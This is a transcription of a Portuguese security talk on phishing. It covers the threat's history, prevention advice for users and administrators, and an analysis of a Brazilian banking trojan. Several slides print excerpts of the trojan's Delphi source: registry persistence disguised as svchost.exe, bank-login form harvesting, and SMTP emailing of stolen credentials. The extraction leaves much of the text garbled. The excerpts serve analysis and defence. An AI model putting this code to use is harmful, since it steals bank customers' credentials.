Impacto e Análise de Phising. Humberto Sartini

Tamanho: px
Começar a partir da página:

Download "Impacto e Análise de Phising. Humberto Sartini http://web.onda.com.br/humberto"

Transcrição

1 Impacto e Análise de Phising Humberto Sartini

2 Palestrante Humberto Sartini Analista de Segurança do Provedor OndaRPC Participante dos projetos: Rau-Tu Linux ( ) HoneypotBR ( ) RootCheck ( ) Participante do: IV e V Fórum Internacional de SL Conferência Internacional de SL ( Curitiba ) Conisli (São Paulo/SP )

3 Tópicos O que é Phising? História do Phising Cenário Atual Motivação do Phiser Como o usuário pode se prevenir? O que o administrador pode fazer? Impactos causados Exemplos Análise de Phising em tempo real

4 O que é Phising? É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários. Fonte:

5 O que é Phising? A palavra Phising (de fishing ) vem de uma analogia criada pelos fraudadores, onde iscas ( s) são usados para pescar senhas e dados financeiros de usuários da Internet. Fonte:

6 História do Phising Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine AOL 1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc...) 1995: Utilização de Força-Bruta 1997: Suporte AOL solicitando dados de usuário e senha. Fonte: Wikipedia

7 Cenário Atual Formas de Envio Através de s (quase que a totalidade) Sites com códigos maliciosos que aproveitam falhas de segurança de Navegadores, Leitores de s e Sistemas Operacionais Sites com brechas de segurança (PHP Nuke, FormMail,...) Programas de Mensagem Instantânea (MSN, AIM, ICQ,...) Combinação de duas ou mais técnicas

8 Cenário Atual Facilidades encontradas pelo Phiser: Código fonte de vários Phising/Scam em várias linguagens Compactador de EXE (Petite) Versões bugadas de Softwares Ingenuidade (??) do usuário

9 Cenário Atual Facilidades encontradas pelo Phiser: Burrocracia das Grandes Provedores Operadoras e Delegacias Virtuais despreparadas e sem equipamentos

10 Cenário Atual Falta de Legislação específica Sugere ao Ministério da Justiça a criação de delegacias especializadas na repressão aos crimes cibernéticos (21/06/2005) Atribui à Justiça Federal o processamento de crimes praticados no âmbito da Internet ou em ambientes similares, disseminados em escala mundial (02/06/2005)

11 Cenário Atual Falta de Legislação específica Tipificando os crimes informáticos, praticados pelos chamados "hackers", incluindo os crimes de sabotagem, falsidade e fraude informática; autorizando as autoridades a interceptarem dados dos provedores e prevendo a pena de reclusão para quem armazena, em meio eletrônico, material pornográfico, envolvendo criança e adolescente. (15/09/2004)

12 Cenário Atual Crescimento de Fraudes 65,00 60,00 55,00 50,00 Af 45,00 Aw 40,00 Dos 35,00 Fraude 30,00 Invasão Scan 25,00 Worm 20,00 15,00 10,00 5,00 0,

13 Motivação do Phiser

14 Motivação do Phiser Impunidade Legislação Falha ( Nacional e Internacional ) Máquinas Escravas x Pichação de Sites Aluguel de BOTNET ($$$)

15 Como o usuário pode se prevenir? Browsers Manter o browser sempre atualizado Desativar a execução de programas Java Desativar a execução de JavaScripts antes de entrar em uma página desconhecida Permitir que programas ActiveX sejam executados em seu computador apenas quando vierem de sites conhecidos e confiáveis Manter maior controle sobre o uso de cookies Fonte:

16 Como o usuário pode se prevenir? Browsers Bloquear pop-up windows e permiti-las apenas para sites conhecidos e confiáveis Certificar-se da procedência do site e da utilização de conexões seguras ao realizar transações via Web Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser Fonte:

17 Como o usuário pode se prevenir? Leitores de s Manter sempre a versão mais atualizada do programa leitor de s Não clicar em links que, por ventura, possam aparecer no conteúdo do Evitar abrir arquivos ou executar programas anexados aos s Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas Fonte:

18 O que o administrador pode fazer? É fundamental para amenizar os impactos causados pelos Phisings / Scams Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o para o Cert.br Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams

19 O que o administrador pode fazer? Servidores de s Atenção especial aos s com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh Atenção especial aos s com link apontando para arquivos com as seguintes extensões: bat, pif e scr

20 O que o administrador pode fazer? Servidores de s Ativação da checagem de DNS Reverso, HELO, Listas RBL SPF

21 O que o administrador pode fazer? Servidores de Páginas Alteração de Mime Type de arquivos com extensão duvidosas (bat, com, pif, scr) Atenção a CGI (FormMail)e PHP (Php Nuke) Eliminar Cross Site Scripting

22

23

24 h ttp:/ / w w w.brtu rbo.c o m.br/ in clu de s / barrap.js p?c= FFFFFF&u rl= h ttp:/ / w w w. po p.co m.br/ barra.ph p?u rl= h ttp:/ / w w w.o i.co m.br/ s e rv ice s / PO/ Fram e Se t/ Fra m e Se t.ph p?url= h ttp:/ / w w w.ibe s t.co m.br/ s ite / parce iro s / e s tadao.js p?lin k = h t tp:/ / w w w.ibe s t.e s tadao.co m.br/ age s tado /?i= 1

25 Impactos causados Perda de Produtividade Consumo de recursos computacionais (processamento, armazenamento, banda, etc...) Golpes e Fraudes Ameaça a Segurança da Informação

26

27

28

29

30 Exem p lo s e Cas o s Reais Tod os os exem p los d e Ph is in gs, e m u it os ou t ros, es t ão n o s it e: h t t p :/ / web.on d a.com.br/ h u m bert o

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80 Análise de Artefato 100,00 90,00 Kaspersky TheHacker NOD32v2 Avast VBA32 Symantec Sybari F-Prot DrWeb 80,00 McAfee 70,00 CAT-QuickHeal Fortinet 60,00 BitDefender 50,00 Ikarus 40,00 AntiVir Avira AVG 30,00 ClamAV 20,00 Panda 10,00 etrust-iris 0,00 Sophos Norman Porc. (%)

81 Exem p lo s e Cas o s Reais Agora s erão m os t rad as algu n s t rech os d os cód igos fon t es d os s oft wares u t iliz ad os Es s e s oft ware s im u la os s egu in t es ban cos : BB, Real, It au, Brad es co, Caixa, Un iban co, Un iem p res a, Ban es p a, San t an d er, BBJu rid ica, BEC, BRB, Nos s acaixa, Ban ris u l, Ban coru ral e Nord es t e

82 Exem p lo s e Cas os Reais Ap p lica t ion.sh owma in For m := fa ls e; Ap p lica t ion.cr ea t efor m (TFor m 1, For m 1 ); Ap p lica t ion.cr ea t efor m (Tfr m BB, fr m BB); Ap p lica t ion.cr ea t efor m (Tfor m 3, for m 3 ); Ap p lica t ion.cr ea t efor m (Tfr m It a u, fr m It a u ); Ap p lica t ion.cr ea t efor m (Tfor m 6, for m 6 ); Ap p lica t ion.cr ea t efor m (Tfr m Br a, fr m Br a ); Ap p lica t ion.cr ea t efor m (Tfr m Un ib a n co, fr m Un ib a n co); Ap p lica t ion.cr ea t efor m (Tfr m Un iem p r es a, fr m Un iem p r es a ); Ap p lica t ion.cr ea t efor m (Tfr m Ba n es p a, fr m Ba n es p a ); Ap p lica t ion.cr ea t efor m (Tfr m Sa n t a n d er, fr m Sa n t a n d er ); Ap p lica t ion.cr ea t efor m (Tfr m BBJu r id ica, fr m BBJu r id ica ); Ap p lica t ion.cr ea t efor m (Tfr m BEC, fr m BEC); Ap p lica t ion.cr ea t efor m (Tfr m BRB, fr m BRB); Ap p lica t ion.cr ea t efor m (Tfr m Nos s a Ca ixa, fr m Nos s a Ca ixa ); Ap p lica t ion.cr ea t efor m (Tfr m Ba n r is u l, fr m Ba n r is u l); Ap p lica t ion.cr ea t efor m (Tfr m Ba n coru r a l, fr m Ba n coru r a l); Ap p lica t ion.cr ea t efor m (Tfr m Nor d es t e, fr m Nor d es t e);

83 Exem p lo s e Cas o s Reais fu n ct ion TFor m 1.p r occr ia Regis t r odein icia r Ap lica ca o (Rem over : BOOL): s t r in g; b egin r egap lica ca o := TRegis t r y.cr ea t e; try wit h r egap lica ca o d o b egin s t r Ch a veap p := 's vch os t '; Ro ot Key := HKEY_LOCAL_MACHINE; if Op en Key(s t r CHAVE_INICIAR, Tr u e) t h en b egin if Rem over = t r u e t h en r ega p lica ca o.delet eva lu e(s t r Ch a veap p ) els e Wr it est r in g(s t r Ch a veap p, PASTA+ '\ con fig\ s vch os t.exe'); en d ;

84 Exem p lo s e Cas os Reais com p u t a d or := n om ecom p u t a d or ; m es s a geb od y.bod y.ad d ('Nom e d o Com p u t a d or : ' + com p u t a d or + ' In fect ed ' ); m es s a geb od y.bod y.ad d ('IP: '+ Get IP + ' '); m es s a geb od y.bod y.ad d ('Da t a : '+ d a t et o s t r (n o w) + ' Ho r a : '+ t im et os t r (t im e) + ' '); m es s a geb od y.fr om.na m e := 'Ma kin a : ' + com p u t a d or ; m es s a geb od y.recip ien t s.ema ilad d r es s es := 'XXXXXXXX@XXX.com '; m es s a geb od y.su b ject := com p u t a d or + ' In fect a d o'; SMTP.Hos t := 's m t p.xxxx.com.b r '; SMTP.Au t h en t ica t ion Typ e := a t Login ; SMTP.Us er n a m e := 'XXXXXX'; SMTP.Pa s s wor d := 'XXXXXX'; SMTP.Por t := 2 5 ; s m t p.con n ect ; Tr y s m t p.sen d (m es s a geb od y); excep t SMTP.Hos t := 'm x2.m a il.ya h oo.com ';

85 Exem p lo s e Cas o s Reais SMTP.Ho s t := 's m t p.xxxx.com.b r '; / / p õe a q u i o s eu s m t p SMTP.Au t h en t ica t ion Typ e := a t Login ; SMTP.Por t := 2 5 ; SMTP.Us er n a m e := 'XXXXXXXX'; / / o u s er SMTP.Pa s s wor d := 'XXXXXXXX'; / / a s en h a t r y SMTP.Con n ect ; excep t s elf.clos e; en d ; wit h m es s a geb od y d o b egin Fr om.text := 'h 3 llm 4 5 t 3 r r '; Fr om.ad d r es s := 'h 3 llm 4 5 t 3 r r '; / / Recip ien t s.ema ilad d r es s es := 'XXXXXX@XXX.com '; / / Qu em r eceb er á a s in fo Su b ject := 'b a n k Accou n t s '; / / a n t es r eflit a q o Cr Az Y é o m a ior d os m a ior es ^ ^ Bo d y.ad d St r in gs (Da d os ); en d ;

86 Exem p lo s e Cas o s Reais Da t a := TSt r in glis t.cr ea t e; d a t a.ad d (' > > > Ba n co Ru r a l < < < '); d a t a.a d d ('RURAL Us u a r io: '+ fr m Ba n coru r a l.r u r a lu s u.t ext ); d a t a.a d d ('RURAL Sen h a : '+ fr m Ba n coru r a l.s en u s u.t ext ); d a t a.a d d ('RURAL Agen cia : '+ fr m Ba n coru r a l.a gen.t ext ); d a t a.ad d ('RURAL Tip o: '+ fr m Ba n coru r a l.t ip o.t ext ); d a t a.a d d ('RURAL Con t a Cor r en t e: '+ fr m Ba n coru r a l.con t a cor.t ext ); d a t a.a d d ('RURAL Digit o: '+ fr m Ba n coru r a l.d ig.t ext ); d a t a.a d d ('RURAL Sen h a : '+ fr m Ba n coru r a l.s en h a fin a l.t ext ); d a t a.a d d (''); for m 1.Clos ein t er n et Exp lor er ; excep t en d ; for m 1.En via Em a il(d a t a );

87 Exem p lo s e Cas os Reais Da t a := TSt r in glis t.cr ea t e; Da t a.ad d (' '); Da t a.ad d (' > > > Ba n co es t a d u a l d o cea r a < < '); d a t a.ad d ('Agen cia : '+ fr m b ec.ed it 1.t ext ); d a t a.ad d ('Con t a : '+ fr m b ec.ed it 2.t ext ); d a t a.ad d ('Digit o: '+ fr m b ec.ed it 6.t ext ); d a t a.ad d ('Sen h a NET: '+ fr m b ec.ed it 3.t ext ); d a t a.ad d ('Res p os t a : '+ fr m b ec.ed it 4.t ext ); Da t a.ad d (' '); for m 1.Clos ein t er n et Exp lor er ; excep t en d ; Fo r m 1.En via Em a il(d a t a ); d a t a.fr ee;

88 An ális e d e Ph is in g em t em p o real Fed o r a Co r e 4 Win d o ws 9 8 Ap a ch e In t er n et Exp lo r er 6 Ds n iff Et h er eal Qem u Tcp Du m p

89 Contato Através do site ou

90 Créditos Sit es con su lt ad os: Cert.b r Cart ilh a d e Segu r an ça p ara In t ern et h t t p :/ / car t ilh a.cert.br/ Fed ora h t t p :/ / fed ora.red h at.com RNP h t t p :/ / p.br/ n ot icias / im p ren sa/ 2005/ n ot - im p - abril2005 Sp am Cos t Calcu lat or h t t p :/ / s con n ect.com / Market in g/ sp am calc.h t m Wikip ed ia h t t p :/ / en.wikip ed ia.org/ wiki/ Ph is h in g

91 Créditos Figura Slide 1: Figura Slide 12 Dados obtidos em: Figura Slide 13: Figura Slide 26 e 27: h ttp :/ / s con n ect.com / Mar ketin g/ sp am calc.h t m Outras Figuras: Arquivo particular

Impacto e Análise de Phising. Humberto Sartini http://web.onda.com.br/humberto

Impacto e Análise de Phising. Humberto Sartini http://web.onda.com.br/humberto Impacto e Análise de Phising Humberto Sartini http://web.onda.com.br/humberto Palestrante Humberto Sartini Analista de Segurança do Provedor OndaRPC Participante dos projetos: Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux

Leia mais

Segurança com Software Livre. Humberto Sartini http://web.onda.com.br/humberto

Segurança com Software Livre. Humberto Sartini http://web.onda.com.br/humberto Segurança com Software Livre Humberto Sartini http://web.onda.com.br/humberto Palestrante Humberto Sartini Analista de Segurança do Provedor Onda S/A Participante dos projetos: Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux

Leia mais

Dicas de Segurança no uso de Computadores Desktops

Dicas de Segurança no uso de Computadores Desktops Universidade Federal de Goiás Dicas de Segurança no uso de Computadores Desktops Jánison Calixto CERCOMP UFG Cronograma Introdução Conceitos Senhas Leitores de E-Mail Navegadores Anti-Vírus Firewall Backup

Leia mais

Software Livre, Segurança e Legislação. Humberto Sartini http://web.onda.com.br/humberto

Software Livre, Segurança e Legislação. Humberto Sartini http://web.onda.com.br/humberto Software Livre, Segurança e Legislação Humberto Sartini http://web.onda.com.br/humberto Palestrante Humberto Sartini Analista de Segurança do Provedor Onda S/A Participante dos projetos: Rau-Tu Linux (

Leia mais

Checklist COOKIES KEYLOGGER PATCHES R. INCIDENTE TECNOLOGIA SPAM INTERNET MA Cartilha de Segurança para Internet

Checklist COOKIES KEYLOGGER PATCHES R. INCIDENTE TECNOLOGIA SPAM INTERNET MA Cartilha de Segurança para Internet SEGURANÇA FRAUDE TECNOLOGIA SPAM INT MALWARE PREVENÇÃO VÍRUS BANDA LARGA TROJAN PRIVACIDADE PHISHING WIRELESS SPYWARE ANTIVÍRUS WORM BLUETOOTH SC CRIPTOGRAFIA BOT SENHA ATAQUE FIREWAL BACKDOOR COOKIES

Leia mais

GERADOR DE RELATÓRIOS

GERADOR DE RELATÓRIOS GERADOR DE RELATÓRIOS Sumário 1. INTRODUÇÃO... 3 2. COMO FUNCIONA?... 4 3. TELA DE LOGIN... 5 4. RELATÓRIOS DE ACESSO A WEB... 6 5. RELATÓRIOS DE USO DE LINK... 14 6. RELATÓRIOS DE USO DE E-MAIL... 18

Leia mais

Segurança em Computadores. GTI SEDU atendimento@sedu.es.gov.br

Segurança em Computadores. GTI SEDU atendimento@sedu.es.gov.br Segurança em Computadores GTI SEDU atendimento@sedu.es.gov.br Agenda Computadores Riscos principais Cuidados a serem tomados Créditos Computadores (1/4) Computador pessoal grande quantidade de dados armazenados

Leia mais

Segurança em Informática

Segurança em Informática Especialização em Gestão das Tecnologias na Educação Básica Disciplina: Informática Aplicada a Educação Prof. Walteno Martins Parreira Júnior Segurança em Informática Inicialmente, responda o questionário

Leia mais

Dicas de como evitar o ataque de vírus

Dicas de como evitar o ataque de vírus Dicas de como evitar o ataque de vírus Recentemente, os casos de bloqueio de IP no Departamento de Química vêm aumentado consideravelmente. Quando um computador está infectado com arquivos maliciosos (vírus,

Leia mais

Vírus é um programa. Sendo que este programa de computadores é criado para prejudicar o equipamento ou sabotar os dados nele existente.

Vírus é um programa. Sendo que este programa de computadores é criado para prejudicar o equipamento ou sabotar os dados nele existente. Segurança da Informação Prof. Jefferson Costa www.jeffersoncosta.com.br Engenharia Social Chama-se Engenharia Social as práticas utilizadas para obter acesso a informações importantes ou sigilosas em organizações

Leia mais

Cartilha de Segurança para Internet

Cartilha de Segurança para Internet Comitê Gestor da Internet no Brasil Cartilha de Segurança para Internet Checklist Versão 3.1 2006 CERT.br Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil Cartilha de Segurança

Leia mais

3. Cópias de segurança de dados armazenados em um computador são importantes para se prevenir de eventuais falhas, como também das consequências de

3. Cópias de segurança de dados armazenados em um computador são importantes para se prevenir de eventuais falhas, como também das consequências de 3. Cópias de segurança de dados armazenados em um computador são importantes para se prevenir de eventuais falhas, como também das consequências de uma possível infecção por vírus. Acerca disso, analise

Leia mais

Cartilha de Segurança para Internet Checklist

Cartilha de Segurança para Internet Checklist Cartilha de Segurança para Internet Checklist NIC BR Security Office nbso@nic.br Versão 2.0 11 de março de 2003 Este checklist resume as principais recomendações contidas no documento intitulado Cartilha

Leia mais

Tipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel

Tipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel Tipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel Tipos de pragas virtuais 1 Vírus A mais simples e conhecida das ameaças. Esse programa malicioso pode ligar-se

Leia mais

Privacidade. <Nome> <Instituição> <e-mail>

Privacidade. <Nome> <Instituição> <e-mail> Privacidade Agenda Privacidade Riscos principais Cuidados a serem tomados Créditos Privacidade (1/3) Sua privacidade pode ser exposta na Internet: independentemente da sua

Leia mais

Prefeitura do Campus USP de Pirassununga Seção Técnica de Informática

Prefeitura do Campus USP de Pirassununga Seção Técnica de Informática CARTILHA DE INFORMÁTICA SEÇÃO TÉCNICA DE INFORMÁTICA PUSP-P Nº 001 - JUNHO/2014 TEMA: SEGURANÇA NA INTERNET Atualmente a maior incidência de problemas em informática está relacionada com a tentativa de

Leia mais

mais segurança na internet próximo Um guia para você tirar suas dúvidas sobre segurança na internet e proteger sua empresa.

mais segurança na internet próximo Um guia para você tirar suas dúvidas sobre segurança na internet e proteger sua empresa. mais segurança na internet Um guia para você tirar suas dúvidas sobre segurança na internet e proteger sua empresa. Suas atitudes na internet podem influenciar a segurança da sua empresa. Você é cuidadoso

Leia mais

MANUAL DO ADMINISTRADOR

MANUAL DO ADMINISTRADOR WinShare Proxy admin MANUAL DO ADMINISTRADOR Instalação do WinShare Índice 1. Instalação 2. Licenciamento 3. Atribuindo uma senha de acesso ao sistema. 4. Configurações de rede 5. Configurações do SMTP

Leia mais

Manual de Instalação ( Client / Server ) Versão 1.0

Manual de Instalação ( Client / Server ) Versão 1.0 1 pág. PROCEDIMENTO DE INSTALAÇÃO DO SGCOM ATENÇÃO: É OBRIGATÓRIO UMA CONEXÃO COM A INTERNET PARA EXECUTAR A INSTALAÇÃO DO SGCOM. Após o Download do instalador do SGCOM versão Server e Client no site www.sgcom.inf.br

Leia mais

MALWARE. Spyware. Seguem algumas funcionalidades implementadas em spywares, que podem ter relação com o uso legítimo ou malicioso:

MALWARE. Spyware. Seguem algumas funcionalidades implementadas em spywares, que podem ter relação com o uso legítimo ou malicioso: MALWARE Spyware É o termo utilizado para se referir a uma grande categoria de software que tem o objetivo de monitorar atividades de um sistema e enviar as informações coletadas para terceiros. Seguem

Leia mais

Guia de Uso para Registro de Chamado Usuário Externo

Guia de Uso para Registro de Chamado Usuário Externo Guia de Uso para Registro de Chamado Usuário Externo Guia de Uso para Registro de Chamado Usuário Externo O é a ferramenta de abertura e acompanhamento de chamados, com os recursos: Sistema de Ajuda online

Leia mais

http://cartilha.cert.br/

http://cartilha.cert.br/ http://cartilha.cert.br/ Manter seu computador seguro é essencial para se proteger dos riscos envolvidos no uso da Internet Um grande risco que você pode correr ao usar a Internet é o de achar que não

Leia mais

Manual (Office 365) Para acesso ao sistema de e-mails, os passos iniciais continuam os mesmos.

Manual (Office 365) Para acesso ao sistema de e-mails, os passos iniciais continuam os mesmos. Histórico de Alterações Versão Data Autor Função Descrição 1 14/09/2012 Roberto Gouveia Analista de Help Desk Criação inicial 2 19/11/2013 Roberto Gouveia Analista de Help Desk Atualização A partir de

Leia mais

Passo 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started.

Passo 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started. 1 - Como obter seu DNS Dinâmico no No-IP O No-IP, é um sistema de DNS (Domain Name Server), que converte o seu endereço IP em um nome. O que o No-IP faz, é converter o nome do tipo minhacameraip.no-ip.org

Leia mais

POLÍTICA DE PRIVACIDADE CONSULTOR HND

POLÍTICA DE PRIVACIDADE CONSULTOR HND POLÍTICA DE PRIVACIDADE CONSULTOR HND 1. Princípios Gerais Esta Política de privacidade descreve como o CONSULTOR HND coleta e usa informações pessoais fornecidas no nosso site: www.consultorhnd.com.br.

Leia mais

Manual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web

Manual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web Manual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web AÇÕES IMPORTANTES Ao tentar acessar o Cadastro Web por meio da certificação digital, é fundamental realizar

Leia mais

Acesse o Portal da Instituição (http://www.mp.sp.gov.br), e clique na figura.

Acesse o Portal da Instituição (http://www.mp.sp.gov.br), e clique na figura. Seja bem-vindo ao serviço de Correio Eletrônico do Portal do Ministério Público do Estado de São Paulo. O WEBMAIL é um serviço disponível no Portal do Ministério Público do Estado de São Paulo, que permite

Leia mais

Instalação Cliente Notes 6.5

Instalação Cliente Notes 6.5 Instalação Cliente Notes 6.5 1/1 Instalação Cliente Notes 6.5 LCC.008.2005 Versão 1.0 Versão Autor ou Responsável Data 1.0 Fabiana J. Santos 18/11/2005 RESUMO Este documento apresenta um roteiro de instalação

Leia mais

Data: 22 de junho de 2004. E-mail: ana@lzt.com.br

Data: 22 de junho de 2004. E-mail: ana@lzt.com.br Data: 22 de junho de 2004. E-mail: ana@lzt.com.br Manual do Suporte LZT LZT Soluções em Informática Sumário VPN...3 O que é VPN...3 Configurando a VPN...3 Conectando a VPN... 14 Possíveis erros...16 Desconectando

Leia mais

http://cartilha.cert.br/

http://cartilha.cert.br/ http://cartilha.cert.br/ Códigos maliciosos são usados como intermediários e possibilitam a prática de golpes, a realização de ataques e o envio de spam Códigos maliciosos, também conhecidos como pragas

Leia mais

TUTORIAL INSTALAÇÃO DA ROTINA 2075 NO LINUX

TUTORIAL INSTALAÇÃO DA ROTINA 2075 NO LINUX Apresentação O departamento de varejo da PC Sistemas inovou seu produto de frente de caixa, permitindo seu funcionamento no sistema operacional do Linux com a distribuição Ubuntu. O cliente poderá usar

Leia mais

Malwares. Algumas das diversas formas como os códigos maliciosos podem infectar ou comprometer um computador são:

Malwares. Algumas das diversas formas como os códigos maliciosos podem infectar ou comprometer um computador são: Malwares Códigos Maliciosos - Malware Códigos maliciosos (malware) são programas especificamente desenvolvidos para executar ações danosas e atividades maliciosas em um computador. Algumas das diversas

Leia mais

Segurança em Internet Banking. <Nome> <Instituição> <e-mail>

Segurança em Internet Banking. <Nome> <Instituição> <e-mail> Segurança em Internet Banking Agenda Internet Banking Riscos principais Cuidados a serem tomados Créditos Internet Banking (1/4) Permite: realizar ações disponíveis nas agências

Leia mais

Revisão 7 Junho de 2007

Revisão 7 Junho de 2007 Revisão 7 Junho de 2007 1/5 CONTEÚDO 1. Introdução 2. Configuração do Computador 3. Reativar a Conexão com a Internet 4. Configuração da Conta de Correio Eletrônico 5. Política Anti-Spam 6. Segurança do

Leia mais

Solicitação de Manutenção de Veículo. Manual SRM

Solicitação de Manutenção de Veículo. Manual SRM Manual SRM 1 Índice 1. Requerimentos Técnicos para Utilização do Sistema... 4 1.1 Hardware... 4 1.2 Software... 5 1.3 Conexão à Internet... 9 2. Desabilitação do Bloqueio Automático de Pop-ups...10 3.

Leia mais

http://cartilha.cert.br/

http://cartilha.cert.br/ http://cartilha.cert.br/ Via Internet Banking você pode realizar as mesmas ações disponíveis nas agências bancárias, sem enfrentar filas ou ficar restrito aos horários de atendimento Realizar transações

Leia mais

Procedimentos para Reinstalação do Sisloc

Procedimentos para Reinstalação do Sisloc Procedimentos para Reinstalação do Sisloc Sumário: 1. Informações Gerais... 3 2. Criação de backups importantes... 3 3. Reinstalação do Sisloc... 4 Passo a passo... 4 4. Instalação da base de dados Sisloc...

Leia mais

CORREIO inotes. Para acessar o Correio inotes é necessário acessar a Internet.

CORREIO inotes. Para acessar o Correio inotes é necessário acessar a Internet. CORREIO inotes Para acessar o Correio inotes é necessário acessar a Internet. Na sua Área de Trabalho execute dois cliques rápidos no ícone do Internet Explorer. Ao ser exibida a primeira tela do Internet

Leia mais

UNIVERSIDADE FEDERAL DE PELOTAS

UNIVERSIDADE FEDERAL DE PELOTAS Usando um firewall para ajudar a proteger o computador A conexão à Internet pode representar um perigo para o usuário de computador desatento. Um firewall ajuda a proteger o computador impedindo que usuários

Leia mais

Sistema integrado de Aquisição de Vale-transporte para Cartões Eletrônicos. SBCTrans

Sistema integrado de Aquisição de Vale-transporte para Cartões Eletrônicos. SBCTrans Sistema integrado de Aquisição de Vale-transporte para Cartões Eletrônicos SBCTrans A tecnologia facilitando a vida do cidadão Índice Cadastro e Primeiro Acesso... 05 Acessando o Sistema... 08 Menu de

Leia mais

e-nota E Módulo de Entrega da Nota

e-nota E Módulo de Entrega da Nota Página1 e-nota E Módulo de Entrega da Nota Manual do Usuário Produzido por: Informática Educativa Página2 Índice 1. Safeweb e-nota E... 03 2. O que é XML... 04 3. Acesso e-nota E... 05 4. Gerenciamento

Leia mais

Follow-Up Acompanhamento Eletrônico de Processos (versão 3.0) Manual do Sistema. 1. Como acessar o sistema Requisitos mínimos e compatibilidade

Follow-Up Acompanhamento Eletrônico de Processos (versão 3.0) Manual do Sistema. 1. Como acessar o sistema Requisitos mínimos e compatibilidade do Sistema Índice Página 1. Como acessar o sistema 1.1 Requisitos mínimos e compatibilidade 03 2. Como configurar o Sistema 2.1 Painel de Controle 2.2 Informando o nome da Comissária 2.3 Escolhendo a Cor

Leia mais

CUIDADOS COM A INTERNET: CRIMES VIRTUAIS

CUIDADOS COM A INTERNET: CRIMES VIRTUAIS CUIDADOS COM A INTERNET: CRIMES VIRTUAIS > CUIDADOS COM A INTERNET > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > É impossível prever

Leia mais

Política de Segurança Corporativa da Assembleia Legislativa do Estado do Ceará

Política de Segurança Corporativa da Assembleia Legislativa do Estado do Ceará Política de Segurança Corporativa da Assembleia Legislativa do Estado do Ceará Agenda Projeto Realizado Política de Segurança da ALCE Próximos passos Projeto realizado Definição/Revisão da Política de

Leia mais

A segurança na utilização da Internet é um tema muito debatido nos dias atuais devido à grande quantidade de ladrões virtuais.

A segurança na utilização da Internet é um tema muito debatido nos dias atuais devido à grande quantidade de ladrões virtuais. A segurança na utilização da Internet é um tema muito debatido nos dias atuais devido à grande quantidade de ladrões virtuais. Sobre as práticas recomendadas para que a utilização da internet seja realizada

Leia mais

Segurança de Redes & Internet

Segurança de Redes & Internet Boas Práticas Segurança de Redes & Internet 0800-644-0692 Video Institucional Boas Práticas Segurança de Redes & Internet 0800-644-0692 Agenda Cenário atual e demandas Boas práticas: Monitoramento Firewall

Leia mais

Política de privacidade do Movimento Certo Ginástica Laboral Online Última atualização: 17 de março de 2015

Política de privacidade do Movimento Certo Ginástica Laboral Online Última atualização: 17 de março de 2015 Política de privacidade do Movimento Certo Ginástica Laboral Online Última atualização: 17 de março de 2015 Esta Política de privacidade estabelece nossas políticas e procedimentos para coletar, usar e

Leia mais

Microsoft Lync Manual de Instalação e Uso

Microsoft Lync Manual de Instalação e Uso Microsoft Lync Manual de Instalação e Uso Sumário Introdução_... 3 Detalhamento_... 5 Importação_... 8 Funcionalidades na Intranet_... 13 Geração de nova senha... 14 Lembrete de expiração da senha... 15

Leia mais

Dúvidas frequentes: acesso à rede e e-mails institucionais

Dúvidas frequentes: acesso à rede e e-mails institucionais Desde março de 2016 o acesso à rede corporativa e aos e-mails institucionais dos servidores dos Órgãos Centrais e Diretorias de Ensino é criado através da plataforma Secretaria Escolar Digital (SED). Todas

Leia mais

Manual do Usuário. E-DOC Peticionamento Eletrônico TST

Manual do Usuário. E-DOC Peticionamento Eletrônico TST E-DOC Peticionamento APRESENTAÇÃO O sistema E-DOC substituirá o atual sistema existente. Este sistema permitirá o controle de petições que utiliza certificado digital para autenticação de carga de documentos.

Leia mais

ROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE PARA ACESSO AO PERSUS MÓDULO DE GESTÃO DE CONTAS E PROTOCOLO DE IMPUGNAÇÕES E RECURSOS ANS Agência Nacional de

ROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE PARA ACESSO AO PERSUS MÓDULO DE GESTÃO DE CONTAS E PROTOCOLO DE IMPUGNAÇÕES E RECURSOS ANS Agência Nacional de ROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE PARA ACESSO AO PERSUS MÓDULO DE GESTÃO DE CONTAS E PROTOCOLO DE IMPUGNAÇÕES E RECURSOS ANS Agência Nacional de Saúde Suplementar ROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE

Leia mais

Obs: É necessário utilizar um computador com sistema operacional Windows 7.

Obs: É necessário utilizar um computador com sistema operacional Windows 7. Instalando os Pré-Requisitos Os arquivos dos 'Pré-Requisitos' estão localizados na pasta Pré-Requisitos do CD HyTracks que você recebeu. Os arquivos também podem ser encontrados no servidor. (www.hytracks.com.br/pre-requisitos.zip).

Leia mais

Procedimentos para Instalação do Sisloc

